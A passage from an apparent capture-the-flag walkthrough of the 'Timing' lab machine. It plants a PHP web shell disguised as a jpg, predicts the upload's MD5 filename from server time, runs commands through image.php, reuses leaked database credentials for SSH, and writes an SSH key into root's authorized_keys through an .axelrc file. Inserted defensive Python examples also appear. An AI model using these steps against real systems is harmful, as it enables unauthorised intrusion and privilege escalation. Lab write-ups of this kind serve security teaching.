    echo "No permission to access this panel!";
    header('Location: ./index.php');
    die();
}

?>

To access the upload feature the user must have ‘role 1’; otherwise the feature is not available. Now we need to find a way to log in. There are no files containing login details. However, logging in with the previously found user ‘aaron’ as both the username and the password gives us the dashboard.

It says logged in as user 2.

The only way to change the role is through the profile update. Let’s edit the profile and intercept the update request in Burp.

No need to change anything in the above input, as only the role ID matters.

POST /profile_update.php HTTP/1.1
Host: timing.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 53
Origin: http://timing.htb
Connection: close
Referer: http://timing.htb/profile.php
Cookie: PHPSESSID=fo9jpkl47lftjuf6pghqqgtqja

firstName=aaron&lastName=test&email=test&company=test&role=1

Add the role to the data, forward the request and refresh the page. You will see the ‘admin panel’.

Admin panel has upload image feature.

Now it’s time to look into ‘upload.php’ code.

$upload_dir = "images/uploads/";

if (!file_exists($upload_dir)) {
    mkdir($upload_dir, 0777, true);
}

$file_hash = uniqid();

$file_name = md5('$file_hash' . time()) . '_' . basename($_FILES["fileToUpload"]["name"]);
$target_file = $upload_dir . $file_name;
$error = "";
$imageFileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));

if (isset($_POST["submit"])) {
    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
    if ($check === false) {
        $error = "Invalid file";
    }
}

// Check if file already exists
if (file_exists($target_file)) {
    $error = "Sorry, file already exists.";
}

if ($imageFileType != "jpg") {
    $error = "This extension is not allowed.";
}

The code above is what we will look into. Uploaded files are moved to the ‘/images/uploads/’ directory. The file extension must be ‘jpg’, and on upload the filename is renamed using an MD5 hash. The logic behind this MD5 hash is that it takes two inputs, ‘$file_hash’ and ‘time()’, and then appends the base filename of the uploaded file to that hash.

According to the PHP documentation, the uniqid() function generates a unique ID based on microtime (the current time in microseconds). In PHP, single quotes (‘) and double quotes (“) have different meanings and interpretations.

Single-quoted strings display their contents almost completely “as is”. Double-quoted strings interpret a range of escape sequences, and variables inside them are evaluated.

So uniqid() is just a rabbit hole: because ‘$file_hash’ is single-quoted, the literal string is what goes into the MD5 hash, not the generated value. However, time() is also a factor in the MD5 hash. It uses the current time in seconds, which means every second produces a new hash. We need to match the upload time to get the right hash, so we have to make sure our local machine’s clock is not far behind or ahead.

┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# nmap -p 80 --script http-date -v timing.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-18 09:43 EST
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:43
Completed NSE at 09:43, 0.00s elapsed
Initiating Ping Scan at 09:43
Scanning timing.htb (10.10.11.135) [4 ports]
Completed Ping Scan at 09:43, 0.39s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:43
Scanning timing.htb (10.10.11.135) [1 port]
Discovered open port 80/tcp on 10.10.11.135
Completed SYN Stealth Scan at 09:43, 0.39s elapsed (1 total ports)
NSE: Script scanning 10.10.11.135.
Initiating NSE at 09:43
Completed NSE at 09:43, 2.08s elapsed
Nmap scan report for timing.htb (10.10.11.135)
Host is up (0.35s latency).

PORT STATE SERVICE
80/tcp open http
|_http-date: Sat, 18 Dec 2021 14:43:51 GMT; +1s from local time.

NSE: Script Post-scanning.
Initiating NSE at 09:43
Completed NSE at 09:43, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 3.23 seconds
Raw packets sent: 5 (196B) | Rcvd: 4 (588B)
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# date
2021年 12月 18日 星期六 09:43:52 EST

You can check the target’s date and compare it with your own using nmap. The target is ‘-16’ seconds behind my local time. You just need to confirm the time; make sure to set your timezone to GMT.

┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# timedatectl set-timezone GMT
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# nmap -p 80 --script http-date -v timing.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-18 14:47 GMT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:47
Completed NSE at 14:47, 0.00s elapsed
Initiating Ping Scan at 14:47
Scanning timing.htb (10.10.11.135) [4 ports]
Completed Ping Scan at 14:47, 0.44s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 14:47
Scanning timing.htb (10.10.11.135) [1 port]
Discovered open port 80/tcp on 10.10.11.135
Completed SYN Stealth Scan at 14:47, 0.45s elapsed (1 total ports)
NSE: Script scanning 10.10.11.135.
Initiating NSE at 14:47
Completed NSE at 14:47, 2.61s elapsed
Nmap scan report for timing.htb (10.10.11.135)
Host is up (0.39s latency).

PORT STATE SERVICE
80/tcp open http
|_http-date: Sat, 18 Dec 2021 14:47:40 GMT; 0s from local time.

NSE: Script Post-scanning.
Initiating NSE at 14:47
Completed NSE at 14:47, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 3.79 seconds
Raw packets sent: 5 (196B) | Rcvd: 2 (84B)
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# date
2021年 12月 18日 星期六 14:47:44 GMT
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# cat demo.jpg
<?php system($_GET[cmd]);?>

Create a jpg file containing PHP code that gives us code execution. Now we need to start a PHP interactive shell, where we continuously run PHP code to generate the hash from the time and the string.

┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# php -a
Interactive mode enabled

php > while (true){echo date("D M j G:i:s T Y"); echo " = " ; echo md5('$file_hash' . time());echo "\n";sleep(1);}
Sat Dec 18 14:53:10 UTC 2021 = 1a733cff506cb1313d5f1f495ab8296c
Sat Dec 18 14:53:11 UTC 2021 = 3dede351b682585854ab39ca71b4dfc3
Sat Dec 18 14:53:12 UTC 2021 = 40ecf3c85f74f6aba4c8cb13450e6327
Sat Dec 18 14:53:13 UTC 2021 = 9fb581a1b355eff367ab44f9855a1b66
Sat Dec 18 14:53:14 UTC 2021 = a6bd2452092174471a920790925c0b2c
......

Keep it going, do not terminate it. Now we need to upload the jpg file we just created, intercept the upload request, send it to Repeater, read the time in the response and match that time against the hash list from the PHP session.

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2021 15:26:25 GMT
Server: Apache/2.4.29 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 27
Connection: close
Content-Type: text/html; charset=UTF-8

The file has been uploaded.

Check burp response time and find the matching hash of that time from PHP interactive session.

┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# php -a
Interactive mode enabled

php > while (true){echo date("D M j G:i:s T Y"); echo " = " ; echo md5('$file_hash' . time());echo "\n";sleep(1);}
Sat Dec 18 15:26:22 UTC 2021 = 12b8b15cb7d8c2478917de1bd09d0b90
Sat Dec 18 15:26:23 UTC 2021 = 5c472b960701353862e6667809ad9cc5
Sat Dec 18 15:26:24 UTC 2021 = 2faeeb4ca04516e9cf6bb199c9c5c9db
Sat Dec 18 15:26:25 UTC 2021 = a2f22cd589ca87a005c5f56a96a4189e
......

The response time is 15:26:25. Copy the hash for that second, append the base filename of the uploaded jpg file and access it via the img query parameter.
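To make the weakness concrete, here is an added Python example (the editor’s own, not code from this walkthrough or from the Timing box) that reproduces the naming scheme from upload.php, shows how few names the scheme can produce once the response’s Date header is known, and puts a hardened naming function beside it. The function names, the ±skew parameter and the allowed-extension list are assumptions.

```python
"""Why md5('$file_hash' . time()) is predictable, and a safer alternative.

Added example, not code from the walkthrough or from the Timing box.
weak_upload_name() mirrors the upload.php logic quoted earlier; the
hardened scheme and every function name here are the editor's own.
"""
import hashlib
import os
import secrets
from email.utils import parsedate_to_datetime

# Assumed server-side allow-list for the hardened scheme.
ALLOWED_EXTENSIONS = frozenset({"jpg", "jpeg", "png"})


def weak_upload_name(epoch_seconds, original_name):
    """Reproduce upload.php's file name for a given upload second.

    In PHP, '$file_hash' in single quotes is the literal string
    "$file_hash", not the uniqid() value, so the only varying input is
    time(), the Unix timestamp in whole seconds.
    """
    digest = hashlib.md5(f"$file_hash{epoch_seconds}".encode("ascii")).hexdigest()
    return f"{digest}_{os.path.basename(original_name)}"


def candidate_names(date_header, original_name, skew=2):
    """Every name the weak scheme can yield for an upload whose response
    carried this HTTP Date header, allowing +/- skew seconds of drift.

    Defender's takeaway: the name space is only 2*skew+1 entries, so the
    hashed prefix offers no protection once the server reveals its clock.
    """
    centre = int(parsedate_to_datetime(date_header).timestamp())
    return [weak_upload_name(s, original_name)
            for s in range(centre - skew, centre + skew + 1)]


def strong_upload_name(original_name):
    """Hardened replacement: a 128-bit CSPRNG token plus an allow-listed
    extension. The client-supplied base name is not used at all."""
    ext = os.path.splitext(original_name)[1].lower().lstrip(".")
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension not allowed: {ext!r}")
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # The Date header quoted from the upload response in the walkthrough.
    for name in candidate_names("Sat, 18 Dec 2021 15:26:25 GMT", "demo.jpg"):
        print(name)
    print("hardened:", strong_upload_name("demo.jpg"))
```

Run stand-alone, it prints the five candidate names for the Date header quoted above. The point of the hardened function is that a CSPRNG token (secrets.token_hex) and a server-side extension allow-list remove both the predictable prefix and the client-controlled base name.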

Initial Access

┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# curl 'http://timing.htb/image.php?img=images/uploads/a2f22cd589ca87a005c5f56a96a4189e_demo.jpg&cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

As you can see, we have code execution. This machine will not easily give you a reverse shell, as firewall rules (iptables) are in place to block outgoing requests from the www-data user.

┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# curl 'http://timing.htb/image.php?img=images/uploads/a2f22cd589ca87a005c5f56a96a4189e_demo.jpg&cmd=ls+-la+/opt'
total 624
drwxr-xr-x 2 root root 4096 Dec 2 11:19 .
drwxr-xr-x 24 root root 4096 Nov 29 01:34 ..
-rw-r--r-- 1 root root 627851 Jul 20 22:36 source-files-backup.zip

‘/opt’ directory has a backup of website. Let’s download it first.

┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# curl 'http://timing.htb/image.php?img=images/uploads/a2f22cd589ca87a005c5f56a96a4189e_demo.jpg&cmd=cp+/opt/source-files-backup.zip+/var/www/html/images/uploads/'

We can’t access the zip file directly, so copy it to the uploads directory and download it from there.

┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# curl 'http://timing.htb/image.php?img=images/uploads/source-files-backup.zip' --output source-files-backup.zip
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 613k 0 613k 0 0 12744 0 --:--:-- 0:00:49 --:--:-- 16798
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# ls -la
总用量 628
drwxr-xr-x 2 root root 4096 12月 18 15:36 .
drwxr-xr-x 228 root root 4096 12月 18 08:33 ..
-rw-r--r-- 1 root root 27 12月 18 14:50 demo.jpg
-rw-r--r-- 1 root root 627851 12月 18 15:37 source-files-backup.zip

Extract or unzip the file and you will find a .git repository.

┌──(root💀kali)-[~/hackthebox/machine/timing/backup]
└─# ls -la
总用量 76
drwxr-xr-x 6 root root 4096 7月 20 22:34 .
drwxr-xr-x 3 root root 4096 12月 18 15:42 ..
-rw-r--r-- 1 root root 200 7月 20 22:34 admin_auth_check.php
-rw-r--r-- 1 root root 373 7月 20 22:34 auth_check.php
-rw-r--r-- 1 root root 1268 7月 20 22:34 avatar_uploader.php
drwxr-xr-x 2 root root 4096 7月 20 22:34 css
-rw-r--r-- 1 root root 92 7月 20 22:34 db_conn.php
-rw-r--r-- 1 root root 3937 7月 20 22:34 footer.php
drwxr-xr-x 8 root root 4096 7月 20 22:35 .git
-rw-r--r-- 1 root root 1498 7月 20 22:34 header.php
-rw-r--r-- 1 root root 507 7月 20 22:34 image.php
drwxr-xr-x 3 root root 4096 7月 20 22:34 images
-rw-r--r-- 1 root root 188 7月 20 22:34 index.php
drwxr-xr-x 2 root root 4096 7月 20 22:34 js
-rw-r--r-- 1 root root 2074 7月 20 22:34 login.php
-rw-r--r-- 1 root root 113 7月 20 22:34 logout.php
-rw-r--r-- 1 root root 3041 7月 20 22:34 profile.php
-rw-r--r-- 1 root root 1740 7月 20 22:34 profile_update.php
-rw-r--r-- 1 root root 984 7月 20 22:34 upload.php

Let’s extract the git commits using GitTools.

┌──(root💀kali)-[~/hackthebox/machine/timing/backup]
└─# /root/GitTools-master/Extractor/extractor.sh . source
###########
# Extractor is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
[*] Destination folder does not exist
[*] Creating...
[+] Found commit: 16de2698b5b122c93461298eab730d00273bd83e
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/admin_auth_check.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/auth_check.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/avatar_uploader.php
[+] Found folder: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/css
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/css/bootstrap.min.css
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/css/login.css
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/db_conn.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/footer.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/header.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/image.php
[+] Found folder: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/images
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/images/background.jpg
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/images/user-icon.png
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/index.php
[+] Found folder: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/js
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/js/avatar_uploader.js
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/js/bootstrap.min.js
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/js/jquery.min.js
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/js/profile.js
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/login.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/logout.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/profile.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/profile_update.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/upload.php
[+] Found commit: e4e214696159a25c69812571c8214d2bf8736a3f
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/admin_auth_check.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/auth_check.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/avatar_uploader.php
[+] Found folder: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/css
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/css/bootstrap.min.css
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/css/login.css
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/db_conn.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/footer.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/header.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/image.php
[+] Found folder: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/images
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/images/background.jpg
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/images/user-icon.png
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/index.php
[+] Found folder: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/js
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/js/avatar_uploader.js
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/js/bootstrap.min.js
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/js/jquery.min.js
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/js/profile.js
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/login.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/logout.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/profile.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/profile_update.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/upload.php

After commit extraction, you will see two directories. Now we need to find what has changed in terms of code.

┌──(root💀kali)-[~/hackthebox/machine/timing/backup/source]
└─# ls
0-16de2698b5b122c93461298eab730d00273bd83e 1-e4e214696159a25c69812571c8214d2bf8736a3f
┌──(root💀kali)-[~/hackthebox/machine/timing/backup/source]
└─# diff 0-16de2698b5b122c93461298eab730d00273bd83e/ 1-e4e214696159a25c69812571c8214d2bf8736a3f/
diff '--color=auto' 0-16de2698b5b122c93461298eab730d00273bd83e/commit-meta.txt 1-e4e214696159a25c69812571c8214d2bf8736a3f/commit-meta.txt
1,4c1,3
< tree dcbc181650833009145874df7da85b4c6d84b2ca
< parent e4e214696159a25c69812571c8214d2bf8736a3f
< author grumpy <grumpy@localhost.com> 1626820453 +0000
< committer grumpy <grumpy@localhost.com> 1626820453 +0000
---
> tree fd7fb62599f9702baeb0abdc42a8a4b68e49ec23
> author grumpy <grumpy@localhost.com> 1626820434 +0000
> committer grumpy <grumpy@localhost.com> 1626820434 +0000
6c5
< db_conn updated
---
> init
0-16de2698b5b122c93461298eab730d00273bd83e/css 和 1-e4e214696159a25c69812571c8214d2bf8736a3f/css 有共同的子目录
diff '--color=auto' 0-16de2698b5b122c93461298eab730d00273bd83e/db_conn.php 1-e4e214696159a25c69812571c8214d2bf8736a3f/db_conn.php
2c2
< $pdo = new PDO('mysql:host=localhost;dbname=app', 'root', '4_V3Ry_l0000n9_p422w0rd');
---
> $pdo = new PDO('mysql:host=localhost;dbname=app', 'root', 'S3cr3t_unGu3ss4bl3_p422w0Rd');
0-16de2698b5b122c93461298eab730d00273bd83e/images 和 1-e4e214696159a25c69812571c8214d2bf8736a3f/images 有共同的子目录
0-16de2698b5b122c93461298eab730d00273bd83e/js 和 1-e4e214696159a25c69812571c8214d2bf8736a3f/js 有共同的子目录

The database connection credentials have been modified between the two commits. Let’s try these creds for SSH login as a user.

┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# ssh aaron@10.10.11.135
The authenticity of host '10.10.11.135 (10.10.11.135)' can't be established.
ED25519 key fingerprint is SHA256:l+I6D4WoPXSUZt7KMuKochzDuE9R21TrDSgg9nJcD5I.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.135' (ED25519) to the list of known hosts.
aaron@10.10.11.135's password:
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-147-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sat Dec 18 15:47:36 UTC 2021

System load: 0.0 Processes: 172
Usage of /: 89.8% of 4.85GB Users logged in: 0
Memory usage: 47% IP address for eth0: 10.10.11.135
Swap usage: 0%

=> / is using 89.8% of 4.85GB


8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


aaron@timing:~$ id
uid=1000(aaron) gid=1000(aaron) groups=1000(aaron)
aaron@timing:~$ whoami
aaron
aaron@timing:~$ cat user.txt
52202751554f6dc8c14dc2a637fca55a

The second password is being reused as ‘aaron’ user’s password.

Privilege Escalation - root

aaron@timing:~$ sudo -l
Matching Defaults entries for aaron on timing:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User aaron may run the following commands on timing:
(ALL) NOPASSWD: /usr/bin/netutils

User can run a binary with root privileges. Let’s look into it.

aaron@timing:~$ file /usr/bin/netutils
/usr/bin/netutils: Bourne-Again shell script, ASCII text executable
aaron@timing:~$ cat /usr/bin/netutils
#! /bin/bash
java -jar /root/netutils.jar

It is a shell script, running a java application from root’s directory. Let’s interact with it.

aaron@timing:~$ sudo /usr/bin/netutils
netutils v0.1
Select one option:
[0] FTP
[1] HTTP
[2] Quit
Input >>

Upon execution, the binary offers two options, FTP and HTTP. Set up an HTTP server on Kali and download a test file.

aaron@timing:~$ sudo /usr/bin/netutils
netutils v0.1
Select one option:
[0] FTP
[1] HTTP
[2] Quit
Input >> 1
Enter Url: 10.10.14.30/test.txt
Initializing download: http://10.10.14.30/test.txt
File size: 5 bytes
Opening output file test.txt
Server unsupported, starting from scratch with one connection.
Starting download


Downloaded 5 byte in 0 seconds. (0.01 KB/s)

After download check the downloaded file in ‘aaron’ user’s home directory or current working directory.

aaron@timing:~$ ls -la test.txt 
-rw-r--r-- 1 root root 5 Dec 18 15:54 test.txt

As you can see, the file is owned by root and the ‘aaron’ user has read access to it. We still don’t know what’s happening behind the scenes. Let’s run pspy in one SSH terminal and, in another, execute the sudo binary to find out.

2021/12/15 10:28:04 CMD: UID=0 PID=74557 | wget -r ftp://10.10.14.30
2021/12/15 10:28:30 CMD: UID=0 PID=74623 | /root/axel http://10.10.14.30

These two applications are used behind the scenes to download files: the FTP option runs wget and the HTTP option runs Axel. We can get the Axel version via netcat.
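The pspy lines above are also what a defender would want to catch: a downloader running as UID 0 with a user-supplied destination. The following Python is an added example by the editor, not part of the original walkthrough and not code from the Timing box. The sample lines are constructed to mirror the pspy format shown above; the allow-list of trusted hosts, the extra benign lines and all function names are assumptions.

```python
"""Flag downloader processes that run as root, in pspy-style output.

Added example by the editor, not part of the original walkthrough and not
code from the Timing box. The sample lines are constructed to mirror the
pspy format shown above ("<date> <time> CMD: UID=<n> PID=<n> | <cmdline>");
the allow-list, the extra lines and all function names are assumptions.
"""
import os
import re
import shlex
from urllib.parse import urlparse

# pspy prints one exec event per line; capture the fields we need.
PSPY_LINE = re.compile(
    r"^(?P<ts>\S+ \S+) CMD: UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s+\|\s+(?P<cmd>.*)$"
)

# Tools a sudo wrapper like netutils hands a user-supplied URL to.
DOWNLOADERS = {"wget", "axel", "curl"}

# Hosts root is expected to fetch from (assumed allow-list for this host).
TRUSTED_HOSTS = {"archive.ubuntu.com", "security.ubuntu.com"}

# Constructed sample: the two pspy lines from the walkthrough plus benign noise.
SAMPLE_LOG = """\
2021/12/15 10:28:04 CMD: UID=0 PID=74557 | wget -r ftp://10.10.14.30
2021/12/15 10:28:30 CMD: UID=0 PID=74623 | /root/axel http://10.10.14.30
2021/12/15 10:29:01 CMD: UID=1000 PID=74700 | curl https://example.org/
2021/12/15 10:30:12 CMD: UID=0 PID=74810 | /usr/bin/apt-get update
2021/12/15 10:31:45 CMD: UID=0 PID=74900 | wget http://archive.ubuntu.com/pool/x.deb
not a pspy line at all
"""


def parse_line(line):
    """Return a dict for a well-formed pspy line, or None otherwise."""
    m = PSPY_LINE.match(line.strip())
    if not m:
        return None
    return {"ts": m["ts"], "uid": int(m["uid"]), "pid": int(m["pid"]), "cmd": m["cmd"]}


def extract_hosts(cmdline):
    """Hostnames of every http/https/ftp URL found among the arguments."""
    hosts = []
    for tok in shlex.split(cmdline):
        parsed = urlparse(tok)
        if parsed.scheme in {"http", "https", "ftp"} and parsed.hostname:
            hosts.append(parsed.hostname)
    return hosts


def is_suspicious(event):
    """Root running a downloader against a host outside the allow-list.

    A root-level downloader with no URL on its command line is flagged
    too: its destination or output path may come from a config file
    (as .axelrc and .wgetrc do), which is exactly what to look at.
    """
    if event["uid"] != 0:
        return False
    argv = shlex.split(event["cmd"])
    if not argv or os.path.basename(argv[0]) not in DOWNLOADERS:
        return False
    hosts = extract_hosts(event["cmd"])
    if not hosts:
        return True
    return any(h not in TRUSTED_HOSTS for h in hosts)


def find_alerts(log_text):
    """Parse a pspy capture and return the events worth an analyst's time."""
    alerts = []
    for line in log_text.splitlines():
        event = parse_line(line)
        if event is not None and is_suspicious(event):
            alerts.append(event)
    return alerts


if __name__ == "__main__":
    for ev in find_alerts(SAMPLE_LOG):
        print(f"{ev['ts']} pid={ev['pid']} root ran: {ev['cmd']}")
```

On the constructed sample only the two walkthrough events (wget to ftp://10.10.14.30 and /root/axel to http://10.10.14.30) are reported; the unprivileged curl, the package manager and the fetch from an allow-listed mirror are not. The same logic applies to auditd execve records once the fields are mapped.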

┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# nc -lvnp 80
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 10.10.11.135.
Ncat: Connection from 10.10.11.135:47068.
GET /test.txt HTTP/1.0
Host: 10.10.14.30
Accept: */*
Range: bytes=1-
User-Agent: Axel/2.16.1 (Linux)

The User-Agent header discloses the application version. This version has no CVEs. However, Axel reads a configuration file, and via that file we can have our SSH public key written out as authorized_keys.

┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# locate axel
/usr/share/doc/axel/examples/axelrc.example

If you are on Kali, you will find an example axelrc file.

┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# cat /usr/share/doc/axel/examples/axelrc.example
......
# When downloading a HTTP directory/index page, (like http://localhost/~me/)
# what local filename do we have to store it in?
#
# default_filename = default
......

This ‘default_filename’ will be activated when downloading something without any filename from ‘axel’.

aaron@timing:~$ sudo /usr/bin/netutils
netutils v0.1
Select one option:
[0] FTP
[1] HTTP
[2] Quit
Input >> 1
Enter Url: http://10.10.14.30/
Initializing download: http://10.10.14.30/
File size: 382 bytes
Opening output file default
Server unsupported, starting from scratch with one connection.
Starting download


Downloaded 382 byte in 0 seconds. (0.41 KB/s)

As you can see from the above example, I didn’t provide any file name for the download. Even so, it downloaded something and saved it as ‘default’.

aaron@timing:~$ ls -la default 
-rw-r--r-- 1 root root 382 Dec 18 16:08 default
aaron@timing:~$ cat default
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html>
<title>Directory listing for /</title>
<body>
<h2>Directory listing for /</h2>
<hr>
<ul>
<li><a href="axelrc">axelrc</a>
<li><a href="backup/">backup/</a>
<li><a href="demo.jpg">demo.jpg</a>
<li><a href="source-files-backup.zip">source-files-backup.zip</a>
<li><a href="test.txt">test.txt</a>
</ul>
<hr>
</body>
</html>

If we read the ‘default’ file, we see the HTML of the directory listing page: it just downloaded the whole page and saved it as ‘default’. If we look closely, all the downloaded files have root’s permissions. We can use this to our advantage.

cat axelrc
---------SNIP---------
# When downloading a HTTP directory/index page, (like http://localhost/~me/)
# what local filename do we have to store it in?
#
default_filename = /root/.ssh/authorized_keys
---------SNIP---------

Change the ‘default_filename’ to ‘/root/.ssh/authorized_keys’, save it. Download this file to ‘aaron’ user’s home directory and save it as .axelrc.

If we now download something without providing a file name, it will be written into root’s directory as ‘authorized_keys’. So we will serve our Kali SSH public key and have it saved there. But as we saw previously, what gets saved is the directory listing in HTML format. To avoid that, create a new directory and save your Kali public key in it as index.html.

┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# cp /root/.ssh/id_rsa .
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# cp /root/.ssh/id_rsa.pub index.html
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# cat index.html
ssh-rsa ... root@kali
┌──(root💀kali)-[~/hackthebox/machine/timing]
